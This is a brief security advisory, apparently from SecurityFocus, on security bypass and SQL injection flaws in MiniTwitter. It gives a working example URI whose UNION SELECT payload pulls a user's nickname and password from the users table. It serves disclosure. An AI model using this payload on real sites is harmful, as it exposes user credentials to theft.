MiniTwitter Security Bypass and SQL Injection Vulnerabilities

Attackers can exploit the issues via a browser.

The following example URI is available:

http://www.example.com/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*

The following exploit code is available:


 

Privacy Statement
Copyright 2010, SecurityFocus